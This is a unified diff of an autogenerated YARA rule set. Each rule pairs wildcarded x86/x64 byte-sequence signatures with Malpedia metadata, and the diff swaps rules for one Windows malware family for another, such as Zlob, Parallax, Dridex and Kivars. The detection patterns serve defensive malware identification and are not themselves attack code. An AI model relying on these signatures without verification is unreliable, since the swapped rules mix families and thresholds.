-		$sequence_19 = { 50 c785f8fcffff9c000000 ff15???????? 85c0 0f85a6000000 8d85f8fcffff }
-		$sequence_20 = { b801000000 5b 81c410030000 c20c00 5f 5e 33c0 }
-		$sequence_21 = { 6800300000 6854130000 53 50 ff15???????? 8bd0 }
-		$sequence_22 = { c644241e69 c644241f74 c644242050 c644242172 c64424226f c644242363 885c2424 }
-		$sequence_23 = { 8945a0 681bc64679 8b55f8 52 }
-		$sequence_24 = { c7459400000000 c745ec00000000 eb09 8b45ec }
-		$sequence_25 = { 8b08 8b55e0 895134 8b450c 50 8b4dfc }
-		$sequence_26 = { 8bd8 8b6c2418 85ed 762a 8b4c241c 51 55 }
-		$sequence_27 = { 57 b904000000 bf???????? 33c0 f3a7 }
-		$sequence_28 = { a880 741d 8b4b24 85c9 7616 8b4fe4 }
-		$sequence_29 = { 8b4dfc 890d???????? 8b15???????? 813a0c010000 730e c705????????00000000 33c0 }
-		$sequence_30 = { 8d7c240c 83c9ff 33c0 c644240c57 c644240d69 }
+		$sequence_0 = { 83c404 8b451c c745f80f000000 c745f400000000 c645e400 83f810 }
+		$sequence_1 = { 8bfb 6aff 8d4701 c746140f000000 50 8d4508 }
+		$sequence_2 = { 47 a1???????? 3bf8 7cc1 48 85c0 }
+		$sequence_3 = { 83c404 c745bc0f000000 c745b800000000 c645a800 8d8d60ffffff }
+		$sequence_4 = { c7411000000000 50 c60100 e8???????? 8d4d9c e8???????? 8b4594 }
+		$sequence_5 = { 0f1f4000 b9???????? 8d85e4f6ffff 0f1f440000 8a10 3a11 751a }
+		$sequence_6 = { c1e81f 03c2 0f8431020000 33db 8b4518 8d8d00ffffff 40 }
+		$sequence_7 = { c7411000000000 50 c60100 e8???????? 83ec18 8d4508 8bcc }
+		$sequence_8 = { 6a08 8d4c241c c74424300f000000 c744242c00000000 c644241c00 e8???????? 8b542428 }
+		$sequence_9 = { 83f810 7241 8b8d98fdffff 40 3d00100000 722a }
 
 	condition:
-		7 of them and filesize < 3789824
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Ranbyus_Auto : FILE
+rule MALPEDIA_Win_Zlob_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4a2a0ab8-1d46-5117-bb36-6bc4aa1f9933"
+		id = "a970d088-9ed2-5a54-a209-a213c278b939"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ranbyus_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zlob_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "330e6be70ed45bf6b2dbed5046fb65bb22576b8352f6395b54bf453a6f591094"
+		logic_hash = "7be20af316e82ae77a28c9d29b76181384335b1dbce3a98db4ea9d8cea904efb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108359,32 +108482,32 @@ rule MALPEDIA_Win_Ranbyus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 85c0 751c 6a04 e8???????? }
-		$sequence_1 = { 6a01 6a00 68???????? 68???????? 68???????? e8???????? }
-		$sequence_2 = { e8???????? 59 8b4e05 89410b 8b4605 39780b 7407 }
-		$sequence_3 = { 57 e8???????? 8b7f28 59 }
-		$sequence_4 = { 0bc8 51 e8???????? 8bf8 59 85ff 7422 }
-		$sequence_5 = { a807 752a c1e802 85c0 }
-		$sequence_6 = { c20400 53 55 6a0c 8be9 e8???????? 8bd8 }
-		$sequence_7 = { e8???????? e8???????? 8bce e8???????? 6a03 }
-		$sequence_8 = { 5e eb02 33c0 83630400 83630800 }
-		$sequence_9 = { 5f 5e 5b 5d c21000 57 ff760c }
+		$sequence_0 = { 8d442434 50 c64424385e c644243924 }
+		$sequence_1 = { 47 83ff10 7c9b 5f 5e }
+		$sequence_2 = { ffd7 ffd6 ffd6 ffd7 8b4d08 034c241c 8d442410 }
+		$sequence_3 = { 7415 6a01 68???????? 8bc8 e8???????? a3???????? eb07 }
+		$sequence_4 = { ffd7 ffd6 ffd7 ffd6 ffd6 ffd7 8d85f0eeffff }
+		$sequence_5 = { ffd6 ffd6 ffd7 8b0d???????? 8d442424 50 e8???????? }
+		$sequence_6 = { c685f5feffff61 c685f6feffff63 c685f7feffff34 c685f8feffff66 c685f9feffff36 c685fafeffff39 }
+		$sequence_7 = { ffd6 ffd7 5f 5e 5d 5b 81c494180000 }
+		$sequence_8 = { 50 6a00 ff742420 6802660000 ff742420 }
+		$sequence_9 = { 8b4c2418 ff742428 ff7118 ff7114 52 }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Sslmm_Auto : FILE
+rule MALPEDIA_Win_Downdelph_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4fb6315d-623b-56fe-a1a9-1366cd8ee4e8"
+		id = "077f28c1-b20c-5259-b0d0-bf4a01a0c8a9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sslmm_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.downdelph_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "e05d1383c6fd4195ee348036204c560e38cfb3624a913866f02778d6ae43e5d9"
+		logic_hash = "2ab9cad8274dc5f2dae30f8b9a16e2eba342d8e6c2d2e4a6e6e80698c2dff674"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108398,32 +108521,32 @@ rule MALPEDIA_Win_Sslmm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff9630010000 897c2428 81fb18030980 0f8493feffff }
-		$sequence_1 = { 0f8447010000 03f8 eb08 c744241801000000 8d542464 }
-		$sequence_2 = { 33db 57 8b85ac000000 53 }
-		$sequence_3 = { 56 8bc1 8bf7 8b7c2410 c1e902 f3a5 }
-		$sequence_4 = { ff930c010000 8be8 89742414 3bee 7415 81fd12030900 }
-		$sequence_5 = { 8d4e0c 53 51 89869c000000 e8???????? 8b9790000000 83c408 }
-		$sequence_6 = { 50 8bcf e8???????? c7442410ffffffff eb1f }
-		$sequence_7 = { 53 6a00 6a00 e8???????? 8b96a0000000 83c420 8d4c240c }
-		$sequence_8 = { f2ae f7d1 49 85c9 7e3a }
-		$sequence_9 = { ff15???????? 6a00 6a00 8d542418 6a00 }
+		$sequence_0 = { 8b45fc e8???????? 8b55dc b8???????? }
+		$sequence_1 = { 42 8b45fc 8b04b8 59 }
+		$sequence_2 = { 8955f8 8945fc 8b45fc e8???????? 8b45f8 e8???????? 8d75bc }
+		$sequence_3 = { 8d45cc ba08000000 e8???????? 8d45f4 }
+		$sequence_4 = { 0345e8 33c9 e8???????? 837df401 7e7f 83450804 ff4df4 }
+		$sequence_5 = { ff35???????? 68???????? 8d45e8 ba03000000 }
+		$sequence_6 = { e8???????? 8945fc 837dfc00 0f8484000000 837dfc01 754b }
+		$sequence_7 = { 33c0 89461c 33c0 894620 33c0 894624 33c0 }
+		$sequence_8 = { 4f 75cd 33c0 5a 59 }
+		$sequence_9 = { ba???????? e8???????? 0f8408030000 8d55e0 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Explosive_Rat_Auto : FILE
+rule MALPEDIA_Win_Kivars_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7b0d5ce8-6828-5e32-af59-28d083ff4edd"
+		id = "d7f4c524-5721-516a-9cef-d2a6a4c9899f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.explosive_rat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kivars_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "40a44221da76d27c5ed05de925a337ead09b51104536f440f38ebfb4960fa91d"
+		logic_hash = "0b4c416b9816d7bbf517a345e2ad0668f53e6096c3605ae9037473d6b0f26452"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108437,34 +108560,40 @@ rule MALPEDIA_Win_Explosive_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83460402 8b460c 83e0ef 83c801 89460c 668bc3 eb81 }
-		$sequence_1 = { 7606 2bc2 8bf0 eb02 33f6 8b4110 25c0010000 }
-		$sequence_2 = { eb53 83ec1c 8bf4 83ec1c 8bcc 68???????? eb42 }
-		$sequence_3 = { 51 56 8844244b ffd7 8a530e 83c448 6a01 }
-		$sequence_4 = { 730e dc0d???????? 2bfa 03da 3bfa 7ddd 807d1700 }
-		$sequence_5 = { 8d4c2408 894604 c706???????? e8???????? 50 8bce e8???????? }
-		$sequence_6 = { 7202 8b00 2bf0 57 d1fe 56 53 }
-		$sequence_7 = { 7411 397b40 730c 50 e8???????? 83c404 896b3c }
-		$sequence_8 = { 7303 8d4da0 663b01 740c 6aff 6a00 8d4d9c }
-		$sequence_9 = { 52 e8???????? 83c40c 85c0 745d 8bc8 57 }
+		$sequence_0 = { 8b1d???????? 83c414 33f6 68e8030000 ffd7 }
+		$sequence_1 = { c68424fa160000eb c68424fb160000cb c68424fc16000074 c68424fd1600005a }
+		$sequence_2 = { 4863403c 488b4c2408 4803c8 488bc1 48890424 488b0424 }
+		$sequence_3 = { e9???????? 488d0d84c10000 ff15???????? 8b842454020000 }
+		$sequence_4 = { 742b 8b542414 8b442418 8bce 8d742430 8d3c10 }
+		$sequence_5 = { 2bc8 8bc1 89442438 488b442428 }
+		$sequence_6 = { 8bf0 83c609 33ff 6a74 897c2414 e8???????? }
+		$sequence_7 = { 56 8bf1 8b4650 c706???????? 85c0 }
+		$sequence_8 = { 8b4d14 51 e8???????? 83c40c 8945d8 8b55d8 52 }
+		$sequence_9 = { 51 896c2420 ffd0 8be8 }
+		$sequence_10 = { 88442437 c644243800 c644243900 ff15???????? }
+		$sequence_11 = { 4c8d0d08760000 4c8d0511770000 488d942440020000 488d8c2430010000 e8???????? 4889842450030000 }
+		$sequence_12 = { 488b0d???????? 8b4401fc 39842468100000 743b }
+		$sequence_13 = { 33c9 89442420 894c2410 89442424 }
+		$sequence_14 = { 7538 8b442420 488b8c2480010000 8b542430 }
+		$sequence_15 = { 488d8424a0010000 ba10000000 488bc8 e8???????? b801000000 488b8c24e8010000 }
 
 	condition:
-		7 of them and filesize < 855040
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Retefe_Auto : FILE
+rule MALPEDIA_Win_Feed_Load_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db079941-ad88-585f-9381-dc621d03f57c"
+		id = "e5e8de31-96f1-50f3-b126-f68009a95e5b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.retefe_auto.yar#L1-L261"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feed_load"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.feed_load_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "10f5fe00ae8dec2b9fe4c64e3188b2157517c220142d93e2bb2a9654bee449af"
+		logic_hash = "46de679564e79b2a5c0b197690c16d63fc18a06e57dcb85568ec77e2699570e3"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -108476,51 +108605,32 @@ rule MALPEDIA_Win_Retefe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a01 ff15???????? 8bf0 85f6 7410 6a09 }
-		$sequence_1 = { 51 8bf8 ffd6 85c0 }
-		$sequence_2 = { 68f5000000 50 ff15???????? b801000000 }
-		$sequence_3 = { 8bec 83ec08 807e0800 7555 }
-		$sequence_4 = { 894604 83c404 8bc6 e8???????? }
-		$sequence_5 = { 6a3c 6ad0 6a07 e8???????? 83c41c }
-		$sequence_6 = { 6a79 6ac1 6aec 6a40 6a79 }
-		$sequence_7 = { e8???????? 6a08 e8???????? 894604 }
-		$sequence_8 = { e8???????? 8b4e04 8901 8b4e04 }
-		$sequence_9 = { 8901 8b4e04 33c0 83c404 }
-		$sequence_10 = { 6a52 6af1 6a72 6a8a 6a3f 6a8e }
-		$sequence_11 = { 6a80 6a18 6aee 6a71 6ac7 }
-		$sequence_12 = { 8b4e04 40 3b4104 72ec }
-		$sequence_13 = { 8a0485911c4300 8803 0fb6c5 8a0485911c4300 884301 }
-		$sequence_14 = { 50 e8???????? 53 8d8504ccffff }
-		$sequence_15 = { e8???????? 68???????? 8d4508 897508 50 }
-		$sequence_16 = { 83f836 0f8f80000000 7477 83e816 83f80a }
-		$sequence_17 = { 8b06 56 ff5008 ff15???????? 33c0 }
-		$sequence_18 = { e8???????? 83c408 8906 8bce e8???????? c745fcffffffff }
-		$sequence_19 = { 50 8d8424f8010000 50 ffb42414030000 ffb42414030000 }
-		$sequence_20 = { 660fd60f 8d7f08 8b048d043f4000 ffe0 f7c703000000 }
-		$sequence_21 = { 8b45d4 886de5 8b1485a0bf4200 8a4c1a2d f6c104 7419 }
-		$sequence_22 = { ff15???????? 85c0 7814 57 68???????? 6a17 }
-		$sequence_23 = { c1fb06 83e03f 6bd030 895de4 8b049da0bf4200 }
-		$sequence_24 = { c645f800 8d4847 304c05e4 40 83f814 72f3 8d45e4 }
-		$sequence_25 = { 0f2805???????? 33c0 0f1145e4 c745f42331373d }
-		$sequence_26 = { 50 8d8dd0efffff e8???????? 56 }
-		$sequence_27 = { 8d8dd0efffff 8bd8 e8???????? 8d73fc }
-		$sequence_28 = { 6a2c 8d44244c 56 50 }
+		$sequence_0 = { e8???????? 4863563c 4533c9 4803d6 0fb74a14 4c8d4218 }
+		$sequence_1 = { 7503 4803dd 8bcb 412bcd 8bc1 4983c704 }
+		$sequence_2 = { 33f6 215828 33ff 4533e4 e8???????? 85c0 0f844f010000 }
+		$sequence_3 = { e8???????? 4983ceff 33db 4c8d256cbf0100 895c2420 81fb80000000 }
+		$sequence_4 = { e8???????? 33db 8bf8 85c0 0f8453020000 4c8d2dc25b0100 448bf3 }
+		$sequence_5 = { 7c29 418bc1 488bcf 41f7e5 c1ea07 }
+		$sequence_6 = { 488bc8 ff15???????? 488b4c2428 488d155e2f0300 448b1d???????? 4803c9 }
+		$sequence_7 = { 6683f802 0f852f010000 bb280a0000 448bc3 33d2 488d4c2460 e8???????? }
+		$sequence_8 = { 488d159d650200 488bcb 488905???????? ff15???????? 488d159e650200 488bcb 488905???????? }
+		$sequence_9 = { 488d45e0 4533c9 4889442428 33d2 448975e0 48897c2420 458d4101 }
 
 	condition:
-		7 of them and filesize < 843776
+		7 of them and filesize < 512000
 }
-rule MALPEDIA_Win_Evilbunny_Auto : FILE
+rule MALPEDIA_Win_Parallax_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3746f242-5ef7-565f-99d0-aeeb4c27d515"
+		id = "f999aded-327c-50dd-9dd2-6822fe568c2e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.evilbunny_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.parallax_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "1534b24ff80468ad553b2eed5ffad4b00ea68305fd3769acbc60a82e33460626"
+		logic_hash = "598728667b89c1a79c35abfecdd8c0a41fda3612c3bf2021240a756e9bc3373e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108534,32 +108644,32 @@ rule MALPEDIA_Win_Evilbunny_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4df8 894d0c 6aff 8b5508 52 e8???????? 83c408 }
-		$sequence_1 = { 8b4df4 894d10 e9???????? 8be5 5d c3 43 }
-		$sequence_2 = { 8b4df4 8b1488 8955cc 8b4508 8b08 8b5110 8b45f4 }
-		$sequence_3 = { 8bf4 8d45e0 50 6a00 8b4dfc 51 68???????? }
-		$sequence_4 = { 8b4508 8945fc c745f800000000 c745f400000000 c745f000000000 8bf4 6803800000 }
-		$sequence_5 = { 8bf4 50 ff15???????? 3bf4 e8???????? 8b4dec 83b93008000000 }
-		$sequence_6 = { 8b95a8fcffff 89511c 6a00 8b451c 50 8b4d18 }
-		$sequence_7 = { 8d4da8 51 e8???????? 83c40c c645fc03 8d4d88 e8???????? }
-		$sequence_8 = { 8d8df4feffff 51 e8???????? 83c408 8d95f4feffff 52 e8???????? }
-		$sequence_9 = { c745fccccccccc 894dfc 68eeeac01f 68???????? 8b4dfc e8???????? 8945f8 }
+		$sequence_0 = { 837e3000 740c 8b5630 8d424c 50 e8???????? e9???????? }
+		$sequence_1 = { 6a00 ff35???????? ff5260 837f3400 7413 }
+		$sequence_2 = { 56 ff7508 e8???????? eb5e 3de9030000 7557 }
+		$sequence_3 = { 50 8d45f8 50 ff75fc ff96a4000000 85c0 0f850a010000 }
+		$sequence_4 = { e8???????? 96 5f 5e 5d c20400 55 }
+		$sequence_5 = { c7474000200000 eb18 ff7640 8f45fc 8b35???????? 8b55fc }
+		$sequence_6 = { 3b35???????? 72d0 58 8b1d???????? 6bdb04 03c3 8b7d0c }
+		$sequence_7 = { 7530 6a01 68ff1f0000 e8???????? }
+		$sequence_8 = { 8975e4 8d55f0 8b0e 890a }
+		$sequence_9 = { c7421c00000000 6a06 ff750c e8???????? }
 
 	condition:
-		7 of them and filesize < 1695744
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Ngioweb_Auto : FILE
+rule MALPEDIA_Win_Newposthings_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e5c8d819-248e-5981-b002-cb1c74e63a09"
+		id = "38b154f6-846a-5678-b350-8d87b17b6222"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ngioweb_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newposthings_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "f7e87273e17bbe0f3332951c955e0d14e92adbe20014736bed11afb8541960a1"
+		logic_hash = "fee15bf490538f6a36053584f37721547efa8e7cc1e683e754b3484ec8de6c80"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108573,34 +108683,34 @@ rule MALPEDIA_Win_Ngioweb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f852e010000 83c8ff 837d1002 7503 33c0 40 50 }
-		$sequence_1 = { 56 e8???????? 5e c20400 55 8bec 83ec1c }
-		$sequence_2 = { 57 e8???????? 85c0 0f85a7000000 6a12 5b eb28 }
-		$sequence_3 = { 668955c6 66897dc4 66c745c26300 66c745c06900 66c745be4d00 66895dbc }
-		$sequence_4 = { eb74 8d45b0 50 56 e8???????? 8bf0 56 }
-		$sequence_5 = { 8b5de8 ff4dec 8bc8 8b45f8 8bf9 897df8 0f855fffffff }
-		$sequence_6 = { 33c0 85c9 740e 663901 7409 41 }
-		$sequence_7 = { c645f86c c645f764 c645f62e 884dfa e9???????? 3d26c60be2 }
-		$sequence_8 = { c3 55 8bec 6a04 8d4518 50 ff7514 }
-		$sequence_9 = { 8b4544 3bc6 7406 8b08 50 ff5108 8b4550 }
+		$sequence_0 = { 50 8bcf e8???????? 8bf0 c645fc04 68dcc40110 8d55d4 }
+		$sequence_1 = { 83e11f 8b048538f34500 c1e106 0fbe440804 83e040 5d }
+		$sequence_2 = { ebb4 c745e4141d0210 a1???????? eb1a c745e4101d0210 a1???????? eb0c }
+		$sequence_3 = { 50 baccc40110 8d8dd8feffff e8???????? 83c404 c645fc08 8d4d20 }
+		$sequence_4 = { 8d8d40feffff e9???????? 8d8d24feffff e9???????? 8d8d24feffff }
+		$sequence_5 = { 8d4dd8 e9???????? 8b8d04ffffff e9???????? 8b4d80 e9???????? 8d4d9c }
+		$sequence_6 = { 33cd e8???????? 8be5 5d c21000 817e1800010000 }
+		$sequence_7 = { 8d853cfeffff 50 6a01 6a00 }
+		$sequence_8 = { 8bf0 eb02 33f6 c7442428ffffffff 85f6 7506 56 }
+		$sequence_9 = { c78500ffffff0f000000 c785fcfeffff00000000 c685ecfeffff00 c645fc0e 837d9810 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 827392
 }
-rule MALPEDIA_Win_Derohe_Auto : FILE
+rule MALPEDIA_Win_Dridex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c13e1a85-a976-55b6-90d6-648c0339f374"
+		id = "82474897-84ac-57c0-bc01-9735ab6cae7c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.derohe_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dridex_auto.yar#L1-L1014"
 		license_url = "N/A"
-		logic_hash = "6fba1305105906cd35356cda0d2e36fa76e73b801e4848b11ebc790c439c6d6c"
+		logic_hash = "1b034dcf6182675bbb8a5eb0a34d263edee95de935cc41e9152b6cc845885549"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -108612,32 +108722,147 @@ rule MALPEDIA_Win_Derohe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 8b542404 c60424fd 8b02 ffd0 8b542404 c6042412 }
-		$sequence_1 = { ffd0 8b542404 c604249d 8b02 ffd0 8b542404 c6042481 }
-		$sequence_2 = { ffd0 8b542404 c6042496 8b02 ffd0 8b542404 c60424f6 }
-		$sequence_3 = { ffd0 8b542404 c60424c0 8b02 ffd0 8b542404 c6042415 }
-		$sequence_4 = { e8???????? ebec 8b44242c 8984248c000000 8b442424 89842490000000 8b442428 }
-		$sequence_5 = { ffd0 8b542404 c60424e4 8b02 ffd0 8b542404 c6042467 }
-		$sequence_6 = { f7e2 899424dc040000 89842478010000 8b442454 8b94248c010000 f7e2 899424d8040000 }
-		$sequence_7 = { ffd0 8b542404 c6042494 8b02 ffd0 8b542404 c60424de }
-		$sequence_8 = { ffd0 8b542404 c60424f4 8b02 ffd0 8b542404 c6042487 }
-		$sequence_9 = { ffd0 8b542404 c60424ae 8b02 ffd0 8b542404 c6042416 }
+		$sequence_0 = { e8???????? b910270000 e8???????? e8???????? }
+		$sequence_1 = { ffd6 85c0 7512 e8???????? eb03 }
+		$sequence_2 = { 83f8ff 7505 e8???????? 3d34270000 }
+		$sequence_3 = { c605????????01 c3 c605????????00 c3 }
+		$sequence_4 = { ffd0 e8???????? 85c0 74de }
+		$sequence_5 = { ffd0 85c0 751f e8???????? }
+		$sequence_6 = { 53 53 53 6a01 53 ffd0 }
+		$sequence_7 = { eb0a e8???????? eb03 6a7f }
+		$sequence_8 = { 7406 42 803a00 75fa }
+		$sequence_9 = { c3 31c0 c3 50 }
+		$sequence_10 = { e8???????? 85c0 7407 56 ffd0 }
+		$sequence_11 = { 807c241400 7409 8d4c2410 e8???????? }
+		$sequence_12 = { 7403 56 ffd0 33f6 }
+		$sequence_13 = { e8???????? 85c0 7408 6a00 ffd0 }
+		$sequence_14 = { e8???????? 6880000000 53 53 }
+		$sequence_15 = { e8???????? 6a00 8d4e1c e8???????? }
+		$sequence_16 = { e8???????? eb0a b9d0070000 e8???????? }
+		$sequence_17 = { 85c0 7407 685a040000 ffd0 }
+		$sequence_18 = { e8???????? 3db20d7897 7508 c70350000000 }
+		$sequence_19 = { c70350000000 eb0d 3da665f63e 7506 c703bb010000 }
+		$sequence_20 = { ffd0 5b c3 33c0 }
+		$sequence_21 = { e8???????? 85c0 7404 6a7e ffd0 }
+		$sequence_22 = { 6a00 8bcf e8???????? 50 ffd6 }
+		$sequence_23 = { 8bc8 e8???????? 6a70 8bc8 e8???????? 6a73 }
+		$sequence_24 = { e8???????? e9???????? 807c245000 740a }
+		$sequence_25 = { 85c0 7415 6a01 6a00 6a00 }
+		$sequence_26 = { 7411 c7461003000000 e8???????? 894614 }
+		$sequence_27 = { e8???????? 6a29 8bc8 e8???????? }
+		$sequence_28 = { eb08 83ca20 eb03 83ca10 }
+		$sequence_29 = { e8???????? 8d4dc4 e8???????? 5e }
+		$sequence_30 = { 6a74 8bc8 e8???????? 6a74 }
+		$sequence_31 = { 50 e8???????? 8938 8b35???????? }
+		$sequence_32 = { 6a00 6a00 8d4dfc 51 6aff }
+		$sequence_33 = { 6810270000 50 e8???????? 83c410 }
+		$sequence_34 = { 85c0 7406 6a02 ff36 }
+		$sequence_35 = { e8???????? 50 56 8bcb e8???????? 50 e8???????? }
+		$sequence_36 = { 8b442428 6689c1 66894c2458 66894c245a }
+		$sequence_37 = { 740d 40 83c104 3d00100000 }
+		$sequence_38 = { 6a01 6a02 ffd0 8906 }
+		$sequence_39 = { 890424 894c2404 75dd 8b0424 }
+		$sequence_40 = { 885c2407 89442408 7598 8a442407 }
+		$sequence_41 = { eb00 8b442404 89c1 89ca }
+		$sequence_42 = { c7461002000000 eb0f c7461003000000 e8???????? }
+		$sequence_43 = { 740a 488d4c2448 e8???????? 488d4c2430 }
+		$sequence_44 = { eb0a b988130000 e8???????? 33d2 }
+		$sequence_45 = { 7534 eb00 31c0 89c1 }
+		$sequence_46 = { 31c0 89c1 8b442424 88c2 }
+		$sequence_47 = { 6a64 59 e8???????? 33c9 e8???????? }
+		$sequence_48 = { c20400 55 8bec 83ec34 8365fc00 }
+		$sequence_49 = { 33c0 803900 7411 ffc0 }
+		$sequence_50 = { 51 6880000000 68ffff0000 ff36 ffd0 }
+		$sequence_51 = { 8954242c 8b44242c 89c1 89ca }
+		$sequence_52 = { 8a442427 a801 7534 eb00 }
+		$sequence_53 = { e8???????? 8be8 85ed 7458 }
+		$sequence_54 = { e8???????? 84c0 740f 6a05 }
+		$sequence_55 = { e8???????? 6880000000 55 55 }
+		$sequence_56 = { ff7508 ffd0 33c0 40 5d c20400 }
+		$sequence_57 = { c3 55 8bec 837d0800 7422 }
+		$sequence_58 = { 8d4de0 51 68???????? ffd0 }
+		$sequence_59 = { 6a00 6a02 ffd0 50 }
+		$sequence_60 = { 6a73 e8???????? 833f00 7523 }
+		$sequence_61 = { e8???????? 8bc8 a1???????? ff30 e8???????? }
+		$sequence_62 = { 890424 e8???????? 31c0 83c420 5e }
+		$sequence_63 = { eb0c e8???????? 8bf0 eb03 6a7f }
+		$sequence_64 = { e8???????? 50 ffd7 85c0 7512 }
+		$sequence_65 = { 8b45cc 31c9 8b55d0 39c2 }
+		$sequence_66 = { 8038e9 89c1 8945d0 894dcc }
+		$sequence_67 = { e8???????? 50 53 8d4dd0 e8???????? 50 }
+		$sequence_68 = { 8b45e8 05ffff0000 25ffff0000 83c001 }
+		$sequence_69 = { 83c101 8b55ec 01ca 83fa00 }
+		$sequence_70 = { 8955b0 8975ac 897dc4 747b }
+		$sequence_71 = { 7517 8b0424 8b4801 89c2 01ca 83c205 }
+		$sequence_72 = { 89d3 8945f0 894dec 8955e8 }
+		$sequence_73 = { 83c001 8b4de8 01c1 894de0 }
+		$sequence_74 = { 894e1c 8b4a48 894e20 83c418 5e c3 53 }
+		$sequence_75 = { 57 56 83ec20 8b442430 890424 }
